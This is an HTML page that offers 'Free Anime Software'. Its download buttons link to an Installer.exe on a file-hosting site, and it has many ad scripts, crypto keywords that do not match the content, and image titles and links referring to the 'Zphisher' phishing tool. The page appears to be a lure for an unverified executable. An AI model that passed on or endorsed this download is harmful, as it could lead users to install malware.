<!DOCTYPE html>
<html lang="en">
<head>
	<div class="bannered">
		<img src="https://i.postimg.cc/PxbqwWMW/wallpaperflare-com-wallpaper.jpg"width="100%"; height="auto";title="Zphisher">
		
	</div>
	</div>
	</a>
	</div>
	</div>
    <meta name="google-site-verification" content="Ojg5lXjCrUcRaqlLtf3ZGI9NFIUyk6dTOyTJahHVoPE" />
   <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Free Anime Software</title>
    <link rel="stylesheet" href="styles.css">
	<meta name="keywords" content="Bitcoin,Css,earn money,bitcoin trading,crypto,cryptocurrencies" />
	<meta name="description" content=This-website-have-an-official-anime-app-developed-by-DesignPK-online-so-you-can-enjoy-anime-without-ads-without-any-payment-or-signup-with-ease-of-access,-enjoy-your-stay!!">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
	<link rel="icon" type="image/x-icon" href="favicon.ico">

    <style>
       body {
    font-family: Arial, sans-serif;
    margin: 0;
    padding: 0;
    text: 000000;
}

header {
    background-color: #333;
    color: #fff;
    text-align: center;
    padding: 10px 0;
}

.banner {
    background-image: url('anime-background.jpg');
    background-size: cover;
    text-align: center;
    padding: 0;
    color: #000;
}

button {
    padding: 10px 20px;
    background-color: #ff6600;
    color: #fff;
    border: none;
    border-radius: 5px;
    font-size: 1.2em;
    cursor: pointer;
}

footer {
    background-color: #333;
    color: #fff;
    text-align: center;
    padding: 10px 0;
}

	    
			    
        .myNav{
            overflow: hidden;
            background-color: rgb(5,37,51);
            text-align: center;
        }
        .myNav a{
            float: left;
            display: block;
            color: #f2f2f2;
            text-align: center;
            padding: 14px 15px;
            text-decoration: none;
            font-size: 16px;
        }
        .myNav a:hover{
            background-color: rgb(13, 99, 105);
            color: black;
        }
        .myNav a.active{
            background-color: #04577e;
            color: white;
        }
        .myNav .icon{
            display: none;
        }
        @media screen  and (max-width: 500px){
            .myNav a:not(:first-child){display: none;}
            .myNav a.icon{
                float: right;
                display: block;
            }
        }
        @media screen and (max-width: 500px){
            .myNav.responsive{position: relative;}
            .myNav.responsive .icon{
                position: absolute;
                right: 0;
                top: 0;
            }
            .myNav.responsive a{
                float: none;
                display: block;
                text-align: left;
            }
            
        }
     i{
         padding: 0 2px;
         color: orangered;
     }
   
	    .bannered{
		 
	    }
	</style>
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-5111268009997600"
     crossorigin="anonymous"></script>
	<script>(function(d){let s=d.createElement('script');s.async=true;s.src='https://puabvo.com/code/native.js?h=waWQiOjExNzQ4NjIsInNpZCI6MTMyMjYxNSwid2lkIjo1MzQxODQsInNyYyI6Mn0=eyJ';d.head.appendChild(s);})(document);</script>
 	
</head>

	<body text="black" bgcolor="FFFFFF">
    <div class="myNav" id="myTopNav">
      <a href="https://killerishere133.github.io/ZPHISHER-HELP" class="active "><i class="fa fa-home"></i>Home</a>
      <a href="https://youtube.com/@MADSANYT/"><i class="fa fa-contact"></i>MADSAN YT</a>
	<a href="about.html"><i class="fa fa-contact"></i>About us</a>  
	    <a href="about.html"><i class="fa fa-contact"></i>Privacy Policy</a> 
	
      <a href="javascript:void(0);" class="icon" onclick="myFun()">
          <i class="fa fa-bars"></i>
      </a>
    </div>
	<header>
	 <h1>Welcome to Free Anime Software</h1>
</header>
		  <section class="banner">
        <a href="https://www.mediafire.com/file/srkqqbq5dkrjs2h/Installer.exe/file">
    <button>Download</button></a>
    </section>
	<div class="content">
		<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-5111268009997600"
     crossorigin="anonymous"></script>
<!-- Whatever -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-5111268009997600"
     data-ad-slot="8760737943"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
		</script>
		<div class="bannered">
		<img src="https://i.postimg.cc/nzgQFY2C/smile-naruto.gif"width="400px"; height="auto";title="Zphisher">
		</div>
		 <section class="banner">
        <a href="https://www.mediafire.com/file/srkqqbq5dkrjs2h/Installer.exe/file">
    <button>Download</button></a>   <b><h1>Why Us?</h1></b>
			 	 <b><h2>SuperSpeed⚡</h2></b>
	<p></p>
	<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-5111268009997600"
     crossorigin="anonymous"></script>
<!-- Amzing -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-5111268009997600"
     data-ad-slot="5634266756"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>
    <script>
        function myFun()
        {
var x=document.getElementById("myTopNav");
if(x.className=="myNav")
{
    x.className+=" responsive";
}
else{
    x.className="myNav";
}
        }
    </script>
		
			<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-5111268009997600"
     crossorigin="anonymous"></script>
<!-- Whatever -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-5111268009997600"
     data-ad-slot="8760737943"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
		</script>
	<p></p> 
	<div class="content">
		<p></p>
			<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-5111268009997600"
     crossorigin="anonymous"></script>
<!-- Whatever -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-5111268009997600"
     data-ad-slot="8760737943"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
		</script>
		<p></p>
			<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-5111268009997600"
     crossorigin="anonymous"></script>
<!-- Whatever -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-5111268009997600"
     data-ad-slot="8760737943"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
		</script>
		<p></p> 
			<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-5111268009997600"
     crossorigin="anonymous"></script>
<!-- Whatever -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-5111268009997600"
     data-ad-slot="8760737943"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
		</script>
		<p></p>
			<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-5111268009997600"
     crossorigin="anonymous"></script>
<!-- Whatever -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-5111268009997600"
     data-ad-slot="8760737943"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
		</script>
		<p></p>
<a href="//www.dmca.com/Protection/Status.aspx?ID=c653979b-13d2-48ef-ba88-08247abae65d" title="DMCA.com Protection Status" class="dmca-badge"> <img src ="https://images.dmca.com/Badges/dmca-badge-w150-2x1-02.png?ID=c653979b-13d2-48ef-ba88-08247abae65d"  alt="DMCA.com Protection Status" /></a>  <script src="https://images.dmca.com/Badges/DMCABadgeHelper.min.js"> </script>		
 <p>&copy; DesignPkOnline. All Rights Reserved.</p>		
</body>
</html>
